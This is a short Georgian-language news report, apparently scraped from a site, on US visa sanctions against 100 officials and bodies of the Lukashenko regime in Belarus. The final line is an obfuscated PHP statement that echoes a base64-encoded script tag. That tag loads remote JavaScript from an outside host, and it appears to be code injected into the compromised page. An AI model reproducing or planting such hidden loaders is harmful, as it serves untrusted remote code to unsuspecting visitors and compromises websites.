celsiusi
ავერსი საქკაბელი
ამერიკის შეერთებული შტატები ლუკაშენკოს რეჟიმის 100 წარმომადგენელს და მათთან დაკავშირებულ პირებს სანქციებს უწესებს. ამის შესახებ სახელმწიფო დეპარტამენტის სპიკერმა, ნედ პრაისმა ისაუბრა და თქვა, რომ მათ სავიზო შეზღუდვები დაუწესდებათ იმის გამო, რომ ბელარუსში დემოკრატიული ინსტიტუტებს ძირი გამოუთხარეს და დემოკრატიული პროცესი შეაფერხეს.  
 
პრაისის განცხადებით, სანქცირებული პირები არიან ბელარუსის პრეზიდენტის ადმინისტრაციის, შინაგან საქმეთა სამინისტროს, სახელმწიფო უშიშროების კომიტეტის, ცენტრალური საარჩევნო კომისიის, ასევე გენერალური პროკურატურის თანამშრომლები და მაღალი თანამდებობის პირები. 
 
ასევე, სანქციები დაუწესდებათ ორგანიზებულ დანაშაულთან და კორუფციასთან ბრძოლის მთავარ 
დირექტორატს, ეროვნული სახელმწიფო ტელერადიო კომპანია ბელტელერადიოს, მეორე ეროვნული ტელევიზიას, საჰაერო ძალებს და საჰაერო თავდაცვის ძალებს.
 
სანქციები შეეხება პარლამენტის წევრებს, მოსამართლეებს, უსაფრთხოების სამსახურის თანამშრომლებს, სახელმწიფო უნივერსიტეტის ადმინისტრატორებსა და აღმასრულებელი კომიტეტების წევრებს.
442
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");